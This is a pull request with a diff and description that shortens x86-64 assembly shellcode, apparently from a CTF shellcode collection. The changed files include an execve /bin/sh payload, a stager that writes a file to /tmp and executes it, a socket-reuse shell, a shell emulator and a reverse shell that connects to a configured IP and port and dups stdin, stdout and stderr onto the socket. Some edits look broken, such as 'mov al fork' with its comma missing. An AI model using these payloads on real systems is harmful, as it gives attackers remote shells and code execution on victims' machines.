### PR TITLE
Small optimizations

### DIFF
--- a/64BitLocalBinSh/shell64.s
+++ b/64BitLocalBinSh/shell64.s
@@ -8,13 +8,13 @@ BITS 64
 global main
 
 main:
-	xor  rax, rax
+	xor  eax, eax
 	push rax
 	mov  rdi, 0x68732f2f6e69622f ;/bin//sh
 	push rdi
 	mov  al,  execve
 	mov  rdi, rsp
-	xor  rsi, rsi
-	xor  rdx, rdx
+	xor  esi, esi
+	xor  edx, edx
 	syscall
 

--- a/64bitPutFileOnDisk/shell64.s
+++ b/64bitPutFileOnDisk/shell64.s
@@ -28,15 +28,12 @@ main:
 	mov r8, rbx		; r8 = input
 
 	xor edi, edi		; rdi = 0
-
-	xor edx, edx
 	xor eax, eax
-	xor ecx, ecx
 	xor esi, esi
 	bts esi, 22		; rsi = 4M
-	xor  r9, r9
-	mov dl, 0x3		; rdx = 0x3
-	mov cl, 0x2		; rdl = 0x2
+	xor  r9d, r9d
+	lea edx, [rdi+0x3]	; rdx = 0x3
+	lea ecx, [rdi+0x2]	; rdl = 0x2
 
 	mov al, __NR_mmap
 	syscall 		; call mmap
@@ -48,15 +45,12 @@ main:
 
 	; open(filename, O_CREAT|O_RDWR, 0700)
 	xor eax, eax
-	xor edi, edi
-	xor edx, edx
-	push rax,
+	push rax
 	push qword stackcookie  ; TODO verify this
 	push 0x706d742f		; stack = /tmp/filename\0
 	mov rdi, rsp		; rdi = stack
-	xor esi, esi	
-	mov sil, 0x42		; ril = O_CREAT|O_RDWR
-	mov dl, 0x7
+	lea esi, [rax+0x42]	; ril = O_CREAT|O_RDWR
+	lea edx, [rax+0x7]
 	shl edx, 0x6
 	mov al, __NR_open
 	syscall			; call open

--- a/64bitPutFileOnDisk/shell64.s
+++ b/64bitPutFileOnDisk/shell64.s
@@ -25,17 +25,14 @@ main:
 	; r9  = 0
 
 	; mmap(0, 1M, PROT_READ|PROT_WRITE, MAP_PRIVATE, input_fd, 0)
-	;mov r8, rdx		; r8 = input
+	mov r8, rbx		; r8 = input
 
 	xor edi, edi		; rdi = 0
 
 	xor edx, edx
 	xor eax, eax
 	xor ecx, ecx
-	xor r8, r8
-
 	xor esi, esi
-	
 	bts esi, 22		; rsi = 4M
 	xor  r9, r9
 	mov dl, 0x3		; rdx = 0x3

--- a/64bitPutFileOnDisk/shell64.s
+++ b/64bitPutFileOnDisk/shell64.s
@@ -25,20 +25,19 @@ main:
 	; r9  = 0
 
 	; mmap(0, 1M, PROT_READ|PROT_WRITE, MAP_PRIVATE, input_fd, 0)
-	mov r8, rdx		; r8 = input
+	;mov r8, rdx		; r8 = input
 
-	xor rdi, rdi		; rdi = 0
+	xor edi, edi		; rdi = 0
 
-	mov rdx, rdi
-	mov rax, rdi
-	mov rcx, rdi
-	mov r8, rdi
-	mov r9, rdi
+	xor edx, edx
+	xor eax, eax
+	xor ecx, ecx
+	xor r8, r8
 
-	mov rsi, rdi
-	mov sil, 0x1
-	shl rsi, 22		; rsi = 4M
-
+	xor esi, esi
+	
+	bts esi, 22		; rsi = 4M
+	xor  r9, r9
 	mov dl, 0x3		; rdx = 0x3
 	mov cl, 0x2		; rdl = 0x2
 
@@ -51,17 +50,17 @@ main:
 	mov r9, rsi		; r9 = size
 
 	; open(filename, O_CREAT|O_RDWR, 0700)
-	xor rax, rax
-	mov rdi, rax
-	mov rdx, rax
+	xor eax, eax
+	xor edi, edi
+	xor edx, edx
 	push rax,
 	push qword stackcookie  ; TODO verify this
 	push 0x706d742f		; stack = /tmp/filename\0
 	mov rdi, rsp		; rdi = stack
-	mov rsi, rax	
+	xor esi, esi	
 	mov sil, 0x42		; ril = O_CREAT|O_RDWR
 	mov dl, 0x7
-	shl dl, 0x6
+	shl edx, 0x6
 	mov al, __NR_open
 	syscall			; call open
 	
@@ -69,14 +68,14 @@ main:
 	mov rdi, rax		; rdi = output
 	mov rsi, r8		; rsi = buffer
 	mov rdx, r9		; rdx = size
-	xor rax, rax
+	xor eax, eax
 	mov al, __NR_write
 	syscall			; call write
 
 	; exec(filename, 0, 0)
 	mov rdi, rsp		; rdi = filename
-	xor rsi, rsi		; rsi = 0
-	mov rdx, rsi		; rdx = 0
-	mov rax, rsi		; rax = 0
+	xor esi, esi		; rsi = 0
+	xor edx, edx		; rdx = 0
+	xor eax, eax		; rax = 0
 	mov al, __NR_execve	
 	syscall			; call execve

--- a/64bitSocketReuse/shell64.s
+++ b/64bitSocketReuse/shell64.s
@@ -21,11 +21,11 @@ main:
 	xor edx, edx
 	lea edi, [rdx+20]	;adjust for the popularity of the ctf	
 	
-	;; rdi is the starting fd to read from, we try each in decending order
+	;; rdi is the starting fd to read from, we try each in descending order
 	mov dl, 4 ;read 4 bytes	
 	mov ebx, MAGIC	
 ourread:
-	dec edi 	
+	sub edi, 1 	
 %ifdef DEBUG
 	jnz ourread.next	
 	int 3; this breakpoint triggers if we DON'T find the magic number
@@ -49,7 +49,7 @@ mydup2:
 copy_stdin_out_err:
         mov al, dup2
         syscall
-        dec esi
+        sub esi,1 
         jns copy_stdin_out_err	
 
 

--- a/64bitSocketReuse/shell64.s
+++ b/64bitSocketReuse/shell64.s
@@ -25,7 +25,7 @@ main:
 	mov dl, 4 ;read 4 bytes	
 	mov ebx, MAGIC	
 ourread:
-	dec rdi 	
+	dec edi 	
 %ifdef DEBUG
 	jnz ourread.next	
 	int 3; this breakpoint triggers if we DON'T find the magic number

--- a/64shellEmulator/shell64.s
+++ b/64shellEmulator/shell64.s
@@ -58,7 +58,7 @@ add_token: 	;; calculate the pointer to push
  	
 	lea rdi,[rbx + rsi]  	;rdi points to current token
 	mov [rsp+rdx*8], rdi 	;save the current token pointer building argv
-	inc edx			;increment index into argv
+	add edx, 1		;increment index into argv
 scan_loop:	
 	repne scasb
 	
@@ -66,7 +66,7 @@ scan_loop:
 	sub rsi,rcx
 	xor eax, eax
 	mov byte[rbx+rsi-1],al	;null terminate each token (strtok)
-	
+	mov al, 0x20 		; delimiter
 	test rcx,rcx
 	jnz short add_token
 	

--- a/64shellEmulator/shell64.s
+++ b/64shellEmulator/shell64.s
@@ -11,47 +11,45 @@
 main:
 
 	do_fork:
-	push byte fork
-	pop rax
-	SYSTEM_CALL
-	test rax,rax
+	xor eax, eax
+	mov al fork
+	syscall
+	test eax,eax
 	jz child
 parent:
-	push wait4
-	pop rax
-	xor rdi,rdi		;pid
-	xor rsi,rsi		;status
-	xor rdx,rdx		;options
-	xor rcx,rcx		;struct rusage*=NULL
-	SYSTEM_CALL		;wait(0,0,0,0);
+	xor edi,edi		;pid
+	xor esi,esi		;status
+	xor edx,edx		;options
+	xor ecx,ecx		;struct rusage*=NULL
+	lea eax,[rdi+wait4]
+	syscall			;wait(0,0,0,0);
 	jmp main
 
 child:	
 	cld
 get_input:
-	xor rax,rax
-	cdq
-	mov dx,BUFFERLEN        ;size of read
+	xor eax,eax
+	lea edx,[rax+BUFFERLEN] ;size of read
+	mov r8d, edx		;save readsize
 	sub rsp,rdx		;make some room on the stack
 	mov rsi,rsp		;use new stack space as buffer for read
-	xor rdi,rdi		;fd
+	xor edi,edi		;fd
 	mov al,read	
-	SYSTEM_CALL		;read into stack buffer
+	syscall			;read into stack buffer
 	
-	mov rbp,rax		;save len of str_read
-	test rax,rax		;we must read more than 0 bytes
+	mov ebp,eax		;save len of str_read
+	test eax,eax		;we must read more than 0 bytes
 	jz do_exit 		;synchronous IO or GTFO
-	mov byte [rax+rsp-1],0	;replace newline with nullbyte
-	push rax		;save strlen on the stack
+	xor edx, edx
+	lea rcx, [rax+rsp]
+	mov byte [rcx-1],dl	;replace newline with nullbyte
 	
-
 	;; let's parse the arguments here
-	pop rcx			;return of read pushed by get_input
-	push byte " "		;delimiter
-	pop rax			;we're going to inline a strchr
+	mov ecx,eax		;return of read pushed by get_input
+	lea eax, [rdx+0x20]	;" " (space) is the delimiter
 	mov rbx,rsp		;rbx is the buffer
-	xor rdx,rdx
-	add rsp,BUFFERLEN	;rsp is now going to be argv
+	xor edx,edx
+	add rsp,r8		;rsp is now going to be argv
 add_token: 	;; calculate the pointer to push
 	
 	mov rsi,rbp		;number of chars in buffer
@@ -60,33 +58,28 @@ add_token: 	;; calculate the pointer to push
  	
 	lea rdi,[rbx + rsi]  	;rdi points to current token
 	mov [rsp+rdx*8], rdi 	;save the current token pointer building argv
-	inc rdx			;increment index into argv
-	
-	
+	inc edx			;increment index into argv
+scan_loop:	
 	repne scasb
 	
 	mov rsi,rbp
 	sub rsi,rcx
-	mov byte[rbx+rsi-1],0	;null terminate each token (strtok)
+	xor eax, eax
+	mov byte[rbx+rsi-1],al	;null terminate each token (strtok)
 	
 	test rcx,rcx
-	jz exec
-	
-	jmp short add_token
+	jnz short add_token
 	
 exec:
-	xor rax,rax
+	xor eax,eax
 	mov [rsp+rdx*8],rax
-	cdq
-
 	mov al,execve
 	mov rdi,rbx
 	mov rsi,rsp
-	;; rdx=null
-	SYSTEM_CALL		;execve(cmd,args,environ=NULL);
+	xor edx, edx		; rdx=null
+	syscall		;execve(cmd,args,environ=NULL);
 	
 do_exit:;; exit nicely if anything fails
-	push byte exit
-	pop rax
-	xor rdi,rdi
-	SYSTEM_CALL
+	xor edi,edi
+	lea eax,[rdi+exit]
+	syscall

--- a/reverse64IPv4/r64.s
+++ b/reverse64IPv4/r64.s
@@ -24,33 +24,33 @@ BITS 64
 main:
 	
 open_my_socket:
-	push byte AF_INET
-	pop  rdi
-	push byte SOCK_STREAM
-	pop rsi
-	push byte ANY_PROTO
-	pop rdx
-	SYSTEM_CALL(socket)
+	xor edx, edx; ANY_PROTO
+	lea edi, [rdx+AF_INET]
+	lea esi, [rdx+SOCK_STREAM]
+	lea eax, [rdx+socket]
+	syscall
 
 	xchg rax,rdi
 make_sockaddr:
-	push byte 0		;lame part of sockaddr
+	xor edx, edx
+	push rdx		;lame part of sockaddr
 	mov rax, (IP <<32 | PORT <<16 | AF_INET) 
 	push rax		;important part of sockaddr
 	
 	mov rsi,rsp		;struct sockaddr*
-	push 0x10
-	pop rdx			;addrlen
-	;RDI=sockfd
-	SYSTEM_CALL(connect)
+	lea eax, [rdx+connect]
+	mov dl, 0x10
+	syscall
 	;; assume success (RAX=0)
 	
 	
-	push byte 2		;loop count and FD#
-	pop rsi
+	xor eax, eax
+	lea esi, [rax+2]	;loop count and FD#
+
 copy_stdin_out_err:
-	SYSTEM_CALL(dup2)	
-	dec rsi
+	mov al, dup2
+	syscall
+	dec esi
 	jns copy_stdin_out_err
 	
 	;; Any local shellcode here


### PR DESCRIPTION
I've tried to convert all the xor reg, reg to the shorter form, and switched mov reg1, reg2 with reg2=0 to xor reg1, reg1 which has the same size (2 bytes) but is faster on almost all modern CPU.
In 64bitPutFileOnDisk the comments say that r8 should be equal to rbx, but it was set to 0 in the code, not sure what is the right thing to do.
